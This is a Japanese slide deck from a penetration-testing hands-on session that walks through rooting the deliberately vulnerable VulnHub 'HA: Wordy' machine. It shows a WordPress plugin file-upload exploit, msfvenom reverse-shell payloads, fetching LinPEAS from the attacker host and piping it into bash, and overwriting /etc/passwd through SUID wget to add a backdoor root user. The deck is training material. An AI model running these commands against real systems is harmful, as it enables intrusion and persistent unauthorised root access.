More Related Content
Similar to イエラエセキュリティMeet up 20210820 (20)
イエラエセキュリティMeet up 20210820
- 1. © 2021 Ierae Security Inc. All Rights Reserved. 0
© 2021 Ierae Security Inc. All Rights Reserved.
ハンズオン勉強会
2021年8月20日
- 2. © 2021 Ierae Security Inc. All Rights Reserved. 1
• 講師の紹介
• OSINT PTとVulnHub
• 攻撃者環境の構築
• 本日の攻撃対象
• Walkthrough: Wordy
• チャレンジ問題
• チャレンジ問題 Writeup
AGENDA
- 3. © 2021 Ierae Security Inc. All Rights Reserved. 2
講師の紹介
講師の紹介
- 4. © 2021 Ierae Security Inc. All Rights Reserved. 3
講師の紹介
Twitter: @kawakatz
- 5. © 2021 Ierae Security Inc. All Rights Reserved. 4
OSINT PTとVulnHub
OSINT PTとVulnHub
- 6. © 2021 Ierae Security Inc. All Rights Reserved. 5
OSINT PTとVulnHub
管理アセット(ドメイン・ネットワーク)の調査
サブドメイン探索
利用SaaSの特定
ポートスキャン
各サービスへの調査
認証情報の探索
Google検索
etc...
Webアプリケーションへの攻撃
既知の脆弱性の悪用
認証試行
0dayの調査
etc...
権限昇格
横展開
etc...
エントリーポイント候補の洗い出し
エントリーポイントへの侵入に向けた情報収集
フィッシング
- 7. © 2021 Ierae Security Inc. All Rights Reserved. 6
OSINT PTとVulnHub
管理アセット(ドメイン・ネットワーク)の調査
サブドメイン探索
利用SaaSの特定
ポートスキャン
各サービスへの調査
認証情報の探索
Google検索
etc...
Webアプリケーションへの攻撃
既知の脆弱性の悪用
認証試行
0dayの調査
etc...
権限昇格
横展開
etc...
エントリーポイント候補の洗い出し
エントリーポイントへの侵入に向けた情報収集
フィッシング
- 8. © 2021 Ierae Security Inc. All Rights Reserved. 7
攻撃者環境の構築
攻撃者環境の構築
- 9. © 2021 Ierae Security Inc. All Rights Reserved. 8
攻撃者環境の構築(Kali Linux)
sudo su
passwd
rootユーザの有効化
- 10. © 2021 Ierae Security Inc. All Rights Reserved. 9
本日の攻撃対象
本日の攻撃対象
- 11. © 2021 Ierae Security Inc. All Rights Reserved. 10
本日の攻撃対象
HA: WORDY
URL:https://www.vulnhub.com/entry/ha-wordy,363/
目標:サーバのroot権限を奪取する
- 12. © 2021 Ierae Security Inc. All Rights Reserved. 11
本日の攻撃対象
関連サービス
Hack The Box (https://www.hackthebox.eu/)
Boxと呼ばれるサーバを攻略しながら、PTの基礎的な攻撃手法を学ぶことができるサービス。
Boxは定期的に入れ替わるため、新しいBoxに挑戦し続けることができる。
Challengeと呼ばれるCTF系の問題も多数存在している。
- 13. © 2021 Ierae Security Inc. All Rights Reserved. 12
本日の攻撃対象
関連サービス
TryHackMe (https://tryhackme.com/)
Hack The Boxと似ているが、テーマごとに分けて学習を進めることができる。
- 14. © 2021 Ierae Security Inc. All Rights Reserved. 13
本日の攻撃対象
関連サービス
OSCP (https://www.offensive-security.com/pwk-oscp/、https://ierae.co.jp/lp/ierae-academy/#course1)
Offensive Security社が提供する実践的なPTの資格。
- 15. © 2021 Ierae Security Inc. All Rights Reserved. 14
本日の攻撃対象
関連サービス
OSCP (https://www.offensive-security.com/pwk-oscp/、https://ierae.co.jp/lp/ierae-academy/#course1)
Offensive Security社が提供する実践的なPTの資格。
- 16. © 2021 Ierae Security Inc. All Rights Reserved. 15
本日の攻撃対象
HA: WORDY
URL:https://www.vulnhub.com/entry/ha-wordy,363/
学びたい事
Nmapを用いたポートスキャン
Burp Suiteを用いたHTTP通信の確認
Dirsearchを用いたディレクトリ探索
WPScanを用いたWordPressに対する調査
Exploit Codeの理解・悪用
LinPEASを用いた権限昇格フローの調査
脆弱性の悪用方法の理解・悪用
- 17. © 2021 Ierae Security Inc. All Rights Reserved. 16
検証環境の設定
検証環境の設定
- 18. © 2021 Ierae Security Inc. All Rights Reserved. 17
検証環境の設定
前提条件
VirtualBoxにKali LinuxとWordyがインポートされていること
VirtualBoxのNW設定
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 19. © 2021 Ierae Security Inc. All Rights Reserved. 18
検証環境の設定
NATネットワークを用いた仮想マシン間通信の実現
ここでは、VirtualBoxのNATネットワークを用いて、Kali LinuxとWordy間の通信を実現させます。
ファイル > 環境設定 > ネットワーク > +マーク
VirtualBoxのNW設定
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 20. © 2021 Ierae Security Inc. All Rights Reserved. 19
検証環境の設定
NATネットワークを用いた仮想マシン間通信の実現
各仮想マシンのアダプタとして、先ほど作成したネットワークを用いてNATネットワークを指定します。
VirtualBoxのNW設定
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 21. © 2021 Ierae Security Inc. All Rights Reserved. 20
検証環境の設定
NATネットワークを用いた仮想マシン間通信の実現
2つの仮想マシンを起動します。
Kali Linux側でifconfigコマンドを実行すると、10.0.2.0/24内のIPアドレスが付与されていることが確認できます。
VirtualBoxのNW設定
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 22. © 2021 Ierae Security Inc. All Rights Reserved. 21
検証環境の設定
ホストオンリーアダプタを用いた仮想マシン間通信の実現
netdiscoverコマンドを用いて、指定したIPレンジ内に存在するホストを列挙します。
netdiscover –r 10.0.2.0/24
※ X.X.X.1のIPアドレスは基本的にホストOSとなります。その他、対象のIPアドレスが1つに絞れない場合、ポート
スキャンの段階まで各IPアドレスに実施していただいて問題ありません。
VirtualBoxのNW設定
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 23. © 2021 Ierae Security Inc. All Rights Reserved. 22
Walkthrough: Wordy
Walkthrough: Wordy
- 24. © 2021 Ierae Security Inc. All Rights Reserved. 23
Walkthrough: Wordy
目的:外部からアクセス可能なサービスの列挙
TCPのフルポートスキャン
nmap <IP Address> -p- -sVC –n
-p-: すべてのポートを対象として指定
-sVC (= -sV + -sC): 各サービスのバージョン特定を試行 + 各サービスに対して基礎的な情報収集スクリプトを実行
-n: 逆引きDNS解決を行わない
UDPのTOP1000ポートに対するスキャン
nmap <IP Address> -sUVC –n
-sU: UDPのポートスキャンを実施
URL:https://www.vulnhub.com/entry/ha-wordy,363/
Nmapを用いたポートスキャン
- 25. © 2021 Ierae Security Inc. All Rights Reserved. 24
Walkthrough: Wordy
目的:外部からアクセス可能なサービスの列挙
TCPのフルポートスキャン
nmap <IP Address> -p- -sVC –n
-p-: すべてのポートを対象として指定
-sVC (= -sV + -sC): 各サービスのバージョン特定を試行 + 各サービスに対して基礎的な情報収集スクリプトを実行
-n: 逆引きDNS解決を行わない
UDPのTOP1000ポートに対するスキャン
nmap <IP Address> -sUVC –n
-sU: UDPのポートスキャンを実施
URL:https://www.vulnhub.com/entry/ha-wordy,363/
Nmapを用いたポートスキャン
- 26. © 2021 Ierae Security Inc. All Rights Reserved. 25
Walkthrough: Wordy
目的:外部からアクセス可能なサービスの列挙
TCPのフルポートスキャン
nmap <IPアドレス> -p- -sVC –n
-p-: すべてのポートを対象として指定
-sVC (= -sV + -sC): 各サービスのバージョン特定を試行 + 各サービスに対して基礎的な情報収集スクリプトを実行
-n: 逆引きDNS解決を行わない
UDPのTOP1000ポートに対するスキャン
nmap <IPアドレス> -sUVC –n
-sU: UDPのポートスキャンを実施
URL:https://www.vulnhub.com/entry/ha-wordy,363/
Nmapを用いたポートスキャン
- 27. © 2021 Ierae Security Inc. All Rights Reserved. 26
Walkthrough: Wordy
目的:HTTPリクエスト・レスポンスの確認 + 視覚的な調査
Project options > Misc > Embedded Browser > Allow the embedded browser to run without a sandbox.
Proxy > Intercept > Open Browser
URL:https://www.vulnhub.com/entry/ha-wordy,363/
Burp Suiteを用いたHTTP通信の確認
- 28. © 2021 Ierae Security Inc. All Rights Reserved. 27
Walkthrough: Wordy
目的:HTTPリクエスト・レスポンスの確認 + 視覚的な調査
URL:https://www.vulnhub.com/entry/ha-wordy,363/
Burp Suiteを用いたHTTP通信の確認
- 29. © 2021 Ierae Security Inc. All Rights Reserved. 28
Walkthrough: Wordy
目的:HTTPリクエスト・レスポンスの確認 + 視覚的な調査
Proxy > HTTP history
URL:https://www.vulnhub.com/entry/ha-wordy,363/
Burp Suiteを用いたHTTP通信の確認
- 30. © 2021 Ierae Security Inc. All Rights Reserved. 29
Walkthrough: Wordy
目的:HTTPリクエスト・レスポンスの確認 + 視覚的な調査
AQUATONE (https://github.com/michenriksen/aquatone)
EyeWitness (https://github.com/FortyNorthSecurity/EyeWitness)
URL:https://www.vulnhub.com/entry/ha-wordy,363/
Burp Suiteを用いたHTTP通信の確認
- 31. © 2021 Ierae Security Inc. All Rights Reserved. 30
Walkthrough: Wordy
目的:アクセス可能なURLの発見
Google検索
site:<ドメイン名>
Wayback Machine (https://web.archive.org/)
URL:https://www.vulnhub.com/entry/ha-wordy,363/
Dirsearchを用いたディレクトリ探索
- 32. © 2021 Ierae Security Inc. All Rights Reserved. 31
Walkthrough: Wordy
目的:アクセス可能なURLの発見
waybackurls (https://github.com/tomnomnom/waybackurls)
Twitter: @TomNomNom
waybackurls <ドメイン名>
getallurls (https://github.com/lc/gau)
gau <ドメイン名>
URL:https://www.vulnhub.com/entry/ha-wordy,363/
Dirsearchを用いたディレクトリ探索
- 33. © 2021 Ierae Security Inc. All Rights Reserved. 32
Walkthrough: Wordy
目的:アクセス可能なURLの発見
Dirsearch (https://github.com/maurosoria/dirsearch)
apt install dirsearch
dirsearch –u <URL> (-w <Wordlist>)
-w: 使用するワードリストを指定 (https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content/)
URL:https://www.vulnhub.com/entry/ha-wordy,363/
Dirsearchを用いたディレクトリ探索
- 34. © 2021 Ierae Security Inc. All Rights Reserved. 33
Walkthrough: Wordy
目的:アクセス可能なURLの発見
Dirsearch (https://github.com/maurosoria/dirsearch)
apt install dirsearch
dirsearch –u <URL> (-w <Wordlist>)
-w: 使用するワードリストを指定 (https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content/)
URL:https://www.vulnhub.com/entry/ha-wordy,363/
Dirsearchを用いたディレクトリ探索
- 35. © 2021 Ierae Security Inc. All Rights Reserved. 34
Walkthrough: Wordy
目的:アクセス可能なURLの発見
Dirsearchを用いたディレクトリ探索
- 36. © 2021 Ierae Security Inc. All Rights Reserved. 35
Walkthrough: Wordy
目的:アクセス可能なURLの発見
Dirsearchを用いたディレクトリ探索
- 37. © 2021 Ierae Security Inc. All Rights Reserved. 36
Walkthrough: Wordy
目的:アクセス可能なURLの発見
Wappalyzer (https://www.wappalyzer.com/)
Dirsearchを用いたディレクトリ探索
- 38. © 2021 Ierae Security Inc. All Rights Reserved. 37
Walkthrough: Wordy
目的:WordPress固有の問題の調査
WPScan (https://wpscan.com)
API Tokenがあるとなおよし
URL:https://www.vulnhub.com/entry/ha-wordy,363/
WPScanを用いたWordPressに対する調査
- 39. © 2021 Ierae Security Inc. All Rights Reserved. 38
Walkthrough: Wordy
目的:WordPress固有の問題の調査
WPScan (https://wpscan.com)
http://192.168.43.13/wordpress/?author=1
-> http://192.168.43.13/wordpress/index.php/author/admin/
URL:https://www.vulnhub.com/entry/ha-wordy,363/
WPScanを用いたWordPressに対する調査
- 40. © 2021 Ierae Security Inc. All Rights Reserved. 39
Walkthrough: Wordy
目的:WordPress固有の問題の調査
WPScan (https://wpscan.com)
-eオプションについて
URL:https://www.vulnhub.com/entry/ha-wordy,363/
WPScanを用いたWordPressに対する調査
- 41. © 2021 Ierae Security Inc. All Rights Reserved. 40
Walkthrough: Wordy
目的:WordPress固有の問題の調査
WPScan (https://wpscan.com)
wpscan --url http://<IP Address>/wordpress --enumerate (--api-token <API Token>)
URL:https://www.vulnhub.com/entry/ha-wordy,363/
WPScanを用いたWordPressに対する調査
- 42. © 2021 Ierae Security Inc. All Rights Reserved. 41
Walkthrough: Wordy
目的:WordPress固有の問題の調査
WPScan (https://wpscan.com)
wpscan --url http://192.168.43.13/wordpress --enumerate (--api-token <API Token>)
URL:https://www.vulnhub.com/entry/ha-wordy,363/
WPScanを用いたWordPressに対する調査
- 43. © 2021 Ierae Security Inc. All Rights Reserved. 42
Walkthrough: Wordy
目的:WordPress固有の問題の調査
WPScan (https://wpscan.com)
wpscan --url http://192.168.43.13/wordpress --enumerate (--api-token <API Token>)
URL:https://www.vulnhub.com/entry/ha-wordy,363/
WPScanを用いたWordPressに対する調査
- 44. © 2021 Ierae Security Inc. All Rights Reserved. 43
Walkthrough: Wordy
目的:WordPress固有の問題の調査
WPScan (https://wpscan.com)
wpscan --url http://192.168.43.13/wordpress –enumerate ap (--plugins-detection aggressive)
URL:https://www.vulnhub.com/entry/ha-wordy,363/
WPScanを用いたWordPressに対する調査
- 45. © 2021 Ierae Security Inc. All Rights Reserved. 44
Walkthrough: Wordy
目的:WordPress固有の問題の調査
WPScan (https://wpscan.com)
wpscan --url http://192.168.43.13/wordpress –enumerate ap (--plugins-detection aggressive)
URL:https://www.vulnhub.com/entry/ha-wordy,363/
WPScanを用いたWordPressに対する調査
- 46. © 2021 Ierae Security Inc. All Rights Reserved. 45
Walkthrough: Wordy
目的:WordPress固有の問題の調査
WPScan (https://wpscan.com)
wpscan --url http://192.168.43.13/wordpress –enumerate ap (--plugins-detection aggressive)
searchsploit reflex gallery
URL:https://www.vulnhub.com/entry/ha-wordy,363/
WPScanを用いたWordPressに対する調査
- 47. © 2021 Ierae Security Inc. All Rights Reserved. 46
休憩(5分)
休憩(5分)
- 48. © 2021 Ierae Security Inc. All Rights Reserved. 47
Walkthrough: Wordy
目的:脆弱性の悪用
WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374)
searchsploit -m 36374
cat 36374.txt
Exploit Codeの理解・悪用
- 49. © 2021 Ierae Security Inc. All Rights Reserved. 48
Walkthrough: Wordy
目的:脆弱性の悪用
WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374)
vim exploit.html
python3 –m http.server 80
echo "<?php phpinfo(); ?>" > phpinfo.php
URL:https://www.vulnhub.com/entry/ha-wordy,363/
Exploit Codeの理解・悪用
- 50. © 2021 Ierae Security Inc. All Rights Reserved. 49
Walkthrough: Wordy
目的:脆弱性の悪用
WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374)
http://127.0.0.1/exploit.htmlからphpinfo.phpをサーバにアップロード
-> http://<IP Address>/wordpress/wp-content/uploads/2015/03/phpinfo.php
URL:https://www.vulnhub.com/entry/ha-wordy,363/
Exploit Codeの理解・悪用
- 51. © 2021 Ierae Security Inc. All Rights Reserved. 50
Walkthrough: Wordy
目的:脆弱性の悪用
WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374)
http://127.0.0.1/exploit.htmlからphpinfo.phpをサーバにアップロード
-> http://<IP Address>/wordpress/wp-content/uploads/2015/03/phpinfo.php
URL:https://www.vulnhub.com/entry/ha-wordy,363/
Exploit Codeの理解・悪用
- 52. © 2021 Ierae Security Inc. All Rights Reserved. 51
Walkthrough: Wordy
目的:脆弱性の悪用
WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374)
http://127.0.0.1/exploit.htmlからphpinfo.phpをサーバにアップロード
-> http://<IP Address>/wordpress/wp-content/uploads/2015/03/phpinfo.php
URL:https://www.vulnhub.com/entry/ha-wordy,363/
Exploit Codeの理解・悪用
- 53. © 2021 Ierae Security Inc. All Rights Reserved. 52
Walkthrough: Wordy
目的:脆弱性の悪用
WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374)
vim exploit.html
URL:https://www.vulnhub.com/entry/ha-wordy,363/
Exploit Codeの理解・悪用
- 54. © 2021 Ierae Security Inc. All Rights Reserved. 53
Walkthrough: Wordy
目的:脆弱性の悪用
WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374)
http://127.0.0.1/exploit.htmlからphpinfo.phpをサーバにアップロード(再チャレンジ)
-> http://<IP Address>/wordpress/wp-content/uploads/2021/08/phpinfo.php
URL:https://www.vulnhub.com/entry/ha-wordy,363/
Exploit Codeの理解・悪用
- 55. © 2021 Ierae Security Inc. All Rights Reserved. 54
Walkthrough: Wordy
目的:脆弱性の悪用
WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374)
http://127.0.0.1/exploit.htmlからphpinfo.phpをサーバにアップロード(再チャレンジ)
-> http://<IP Address>/wordpress/wp-content/uploads/2021/08/phpinfo.php
URL:https://www.vulnhub.com/entry/ha-wordy,363/
Exploit Codeの理解・悪用
- 56. © 2021 Ierae Security Inc. All Rights Reserved. 55
Walkthrough: Wordy
目的:脆弱性の悪用
WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload (https://www.exploit-db.com/exploits/36374)
http://127.0.0.1/exploit.htmlからphpinfo.phpをサーバにアップロード(再チャレンジ)
-> http://<IP Address>/wordpress/wp-content/uploads/2021/08/phpinfo.php
URL:https://www.vulnhub.com/entry/ha-wordy,363/
Exploit Codeの理解・悪用
- 57. © 2021 Ierae Security Inc. All Rights Reserved. 56
Walkthrough: Wordy
目的:脆弱性の悪用
Reverse Shell とは
攻撃対象のサーバから攻撃者のサーバ(C2サーバ)に接続し、遠隔操作を可能にすること
Exploit Codeの理解・悪用
① 脆弱性を悪用した攻撃
② C2サーバへ接続
③ C2サーバ越しに遠隔操作
C2サーバ 攻撃対象サーバ
- 58. © 2021 Ierae Security Inc. All Rights Reserved. 57
Walkthrough: Wordy
目的:脆弱性の悪用
Reverse Shell とは
攻撃対象のサーバから攻撃者のサーバ(C2サーバ)に接続し、遠隔操作を可能にすること
Exploit Codeの理解・悪用
① 脆弱性を悪用した攻撃
② C2サーバへ接続
③ C2サーバ越しに遠隔操作
C2サーバ 攻撃対象サーバ
Kali Linux Wordy
- 59. © 2021 Ierae Security Inc. All Rights Reserved. 58
Walkthrough: Wordy
目的:脆弱性の悪用
Metasploit Framework (https://www.metasploit.com/)
msfvenom –l payload | grep php
msfvenom -p php/reverse_php LHOST=<Kali's IP> LPORT=<Kali's Listen Port> -o shell.php
URL:https://www.vulnhub.com/entry/ha-wordy,363/
Exploit Codeの理解・悪用
- 60. © 2021 Ierae Security Inc. All Rights Reserved. 59
Walkthrough: Wordy
目的:脆弱性の悪用
Metasploit Framework (https://www.metasploit.com/)
msfconsole
Exploit Codeの理解・悪用
- 61. © 2021 Ierae Security Inc. All Rights Reserved. 60
Walkthrough: Wordy
目的:脆弱性の悪用
Metasploit Framework (https://www.metasploit.com/)
msf6 > use multi/handler
msf6 > options
Exploit Codeの理解・悪用
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 62. © 2021 Ierae Security Inc. All Rights Reserved. 61
Walkthrough: Wordy
目的:脆弱性の悪用
Metasploit Framework (https://www.metasploit.com/)
msf6 exploit(multi/handler) > set payload php/reverse_php
msf6 exploit(multi/handler) > set LHOST <Kali's IP>
msf6 exploit(multi/handler) > set LPORT <Kali's Listen Port>
msf6 exploit(multi/handler) > run
Exploit Codeの理解・悪用
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 63. © 2021 Ierae Security Inc. All Rights Reserved. 62
Walkthrough: Wordy
目的:脆弱性の悪用
Metasploit Framework (https://www.metasploit.com/)
http://127.0.0.1/exploit.htmlからshell.phpをサーバにアップロード(再チャレンジ)
-> http://<IP Address>/wordpress/wp-content/uploads/2021/08/shell.php
Exploit Codeの理解・悪用
- 64. © 2021 Ierae Security Inc. All Rights Reserved. 63
Walkthrough: Wordy
目的:脆弱性の悪用
WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit) (https://www.exploit-db.com/exploits/36809)
Exploit Codeの理解・悪用
- 65. © 2021 Ierae Security Inc. All Rights Reserved. 64
Walkthrough: Wordy
目的:脆弱性の悪用
WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit) (https://www.exploit-db.com/exploits/36809)
msfconsole
msf6 > search reflex gallery
Exploit Codeの理解・悪用
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 66. © 2021 Ierae Security Inc. All Rights Reserved. 65
Walkthrough: Wordy
目的:脆弱性の悪用
WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit) (https://www.exploit-db.com/exploits/36809)
msf6 > use 0
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > options
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set RHOST <Wordy's IP>
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set TARGETURI /wordpress
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LHOST <Kali's IP>
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LPORT <Kali's Listen Port>
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set Proxies http:127.0.0.1
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > advanced
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set ReverseAllowProxy true
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > run
Exploit Codeの理解・悪用
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 67. © 2021 Ierae Security Inc. All Rights Reserved. 66
Walkthrough: Wordy
目的:脆弱性の悪用
WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit) (https://www.exploit-db.com/exploits/36809)
Exploit Codeの理解・悪用
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 68. © 2021 Ierae Security Inc. All Rights Reserved. 67
Walkthrough: Wordy
目的:脆弱性の悪用
WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit) (https://www.exploit-db.com/exploits/36809)
Exploit Codeの理解・悪用
- 69. © 2021 Ierae Security Inc. All Rights Reserved. 68
休憩(5分)
休憩(5分)
- 70. © 2021 Ierae Security Inc. All Rights Reserved. 69
Walkthrough: Wordy
目的:権限昇格フローの発見
LinPEAS - Linux Privilege Escalation Awesome Script (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh
python3 –m http.server 80
LinPEASを用いた権限昇格フローの調査
- 71. © 2021 Ierae Security Inc. All Rights Reserved. 70
Walkthrough: Wordy
目的:権限昇格フローの発見
PTY (pseudo terminal)
「擬似端末(ぎじたんまつ、英語: pseudo terminal)または疑似ターミナルとは、UNIXにおけるテキスト端末の擬似
デバイスのマスター・スレーブのペアである。仮想コンソール、端末装置、シリアルポートハードウェアなどを使用
しないテキスト端末のインターフェイスを提供する。これらのハードウェアの代わりに、擬似端末セッションの役割
をソフトウェア(プロセス)が代用する。例えば、SSHなどでログインするとこの端末に接続される。」
(引用元: https://ja.wikipedia.org/wiki/%E6%93%AC%E4%BC%BC%E7%AB%AF%E6%9C%AB)
-> より扱いやすい + より見やすいTerminal
meterpreter > shell
python3 –c 'import pty; pty.spawn("/bin/bash")'
LinPEASを用いた権限昇格フローの調査
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 72. © 2021 Ierae Security Inc. All Rights Reserved. 71
Walkthrough: Wordy
目的:権限昇格フローの発見
LinPEAS - Linux Privilege Escalation Awesome Script (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
curl http://<Kali's IP>/linpeas.sh | bash
wget http://<Kali's IP>/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
LinPEASを用いた権限昇格フローの調査
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 73. © 2021 Ierae Security Inc. All Rights Reserved. 72
Walkthrough: Wordy
目的:権限昇格フローの発見
LinPEAS - Linux Privilege Escalation Awesome Script (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
curl http://<Kali's IP>/linpeas.sh | bash
wget http://<Kali's IP>/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
LinPEASを用いた権限昇格フローの調査
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 74. © 2021 Ierae Security Inc. All Rights Reserved. 73
Walkthrough: Wordy
目的:権限昇格フローの発見
LinPEAS - Linux Privilege Escalation Awesome Script (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
cat linpeas.sh | bash
LinPEASを用いた権限昇格フローの調査
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 75. © 2021 Ierae Security Inc. All Rights Reserved. 74
Walkthrough: Wordy
目的:権限昇格フローの発見
LinPEAS - Linux Privilege Escalation Awesome Script (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
LinPEASを用いた権限昇格フローの調査
- 76. © 2021 Ierae Security Inc. All Rights Reserved. 75
Walkthrough: Wordy
目的:権限昇格フローの発見
GTFOBins (https://gtfobins.github.io/)
LinPEASを用いた権限昇格フローの調査
- 77. © 2021 Ierae Security Inc. All Rights Reserved. 76
Walkthrough: Wordy
目的:権限昇格フローの発見
GTFOBins (https://gtfobins.github.io/)
LinPEASを用いた権限昇格フローの調査
- 78. © 2021 Ierae Security Inc. All Rights Reserved. 77
Walkthrough: Wordy
目的:権限昇格フローの発見
GTFOBins (https://gtfobins.github.io/)
cp wget -> SUID
root権限で書き込み可能
LinPEASを用いた権限昇格フローの調査
- 79. © 2021 Ierae Security Inc. All Rights Reserved. 78
Walkthrough: Wordy
目的:権限昇格フローの発見
GTFOBins (https://gtfobins.github.io/)
cp wget -> SUID
root権限で書き込み可能
LinPEASを用いた権限昇格フローの調査
/etc/passwdを書き換えよう!
- 80. © 2021 Ierae Security Inc. All Rights Reserved. 79
Walkthrough: Wordy
目的:権限昇格フローの発見
/etc/passwdの書き換え
ここでは、backdoorとなる管理者ユーザを追加します。
まず、/etc/passwdからrootユーザの行をpasswdファイルの形式と照らし合わせながら見ていきます。
<UserName>:<Password Hash>:<User ID>:<Group ID>:<Comment>:<Home Directory>:<Login Shell>
root:x:0:0:root:/root:/bin/bash
※ Password Hashに「x」と指定されている場合、ハッシュ値は/etc/shadowファイル内で定義されています。
rootユーザの行をベースにbackdoorとなるユーザの行を作成していきます。
LinPEASを用いた権限昇格フローの調査
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 81. © 2021 Ierae Security Inc. All Rights Reserved. 80
Walkthrough: Wordy
目的:権限昇格フローの発見
/etc/passwdの書き換え
ユーザ名とパスワードのハッシュのみを書き換えれば良いため、指定するパスワードハッシュを生成します。
パスワードハッシュは以下の形式になっており、idの値によってハッシュアルゴリズムを特定することができます。
$id$salt$hash
1: MD5
5: SHA256
6: SHA512
LinPEASを用いた権限昇格フローの調査
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 82. © 2021 Ierae Security Inc. All Rights Reserved. 81
Walkthrough: Wordy
目的:権限昇格フローの発見
/etc/passwdの書き換え
ユーザ名とパスワードのハッシュのみを書き換えれば良いため、指定するパスワードハッシュを生成します。
パスワードハッシュは以下の形式になっており、idの値によってハッシュアルゴリズムを特定することができます。
$id$salt$hash
1: MD5
5: SHA256
6: SHA512
こうしたパスワードハッシュはopensslコマンドのpasswdサブコマンドを用いて、以下のように生成することができ
ます。
openssl passwd -<id> -salt <Salt> <Password>
LinPEASを用いた権限昇格フローの調査
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 83. © 2021 Ierae Security Inc. All Rights Reserved. 82
Walkthrough: Wordy
目的:権限昇格フローの発見
/etc/passwdの書き換え
WordyサーバのpasswdをKaliにコピーし、末尾に1行追記します。
その後、Python製のWebサーバを起動し、改ざんしたpasswdファイルを配送する用意をします。
vim passwd
echo 'ieraebackdoor:$1$ierae$1G/feXS0Di6qME/LP6Zg90:0:0:root:/root:/bin/bash' >> passwd
python3 –m http.server 80
LinPEASを用いた権限昇格フローの調査
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 84. © 2021 Ierae Security Inc. All Rights Reserved. 83
Walkthrough: Wordy
目的:権限昇格フローの発見
/etc/passwdの書き換え
wgetのSUIDを悪用してWordyサーバの/etc/passwdを書き換えます。
wget http://<Kali's IP>/passwd –O /etc/passwd
LinPEASを用いた権限昇格フローの調査
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 85. © 2021 Ierae Security Inc. All Rights Reserved. 84
Walkthrough: Wordy
目的:権限昇格フローの発見
/etc/passwdの書き換え
/etc/passwdを書き換えたため、suコマンドを用いてbackdoorのユーザにログインし直すことができます。
結果として、root権限を奪取することに成功しました。
su <Backdoor UserName>
LinPEASを用いた権限昇格フローの調査
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 86. © 2021 Ierae Security Inc. All Rights Reserved. 85
Walkthrough: Wordy
目的:権限昇格フローの発見
/etc/passwdの書き換え
/etc/passwdを書き換えたため、suコマンドを用いてbackdoorのユーザにログインし直すことができます。
結果として、root権限を奪取することに成功しました。
su <Backdoor UserName>
LinPEASを用いた権限昇格フローの調査
URL:https://www.vulnhub.com/entry/ha-wordy,363/
- 87. © 2021 Ierae Security Inc. All Rights Reserved. 86
休憩(5分)
休憩(5分)
- 88. © 2021 Ierae Security Inc. All Rights Reserved. 87
チャレンジ問題
チャレンジ問題
- 89. © 2021 Ierae Security Inc. All Rights Reserved. 88
チャレンジ問題
[!] Title: Gwolle Guestbook <= 1.5.3 - Remote File Inclusion (RFI)
[!] Title: Gwolle Guestbook <= 2.1.0 - Cross-Site Request Forgery (CSRF)
[!] Title: Gwolle Guestbook <= 2.1.0 - Unauthenticated Stored Cross-Site Scripting (XSS)
[!] Title: Gwolle Guestbook <= 2.5.3 - Cross-Site Scripting (XSS)
[!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
[!] Title: Mail Masta 1.0 - Multiple SQL Injection
[!] Title: Reflex Gallery <= 3.1.3 - Arbitrary File Upload
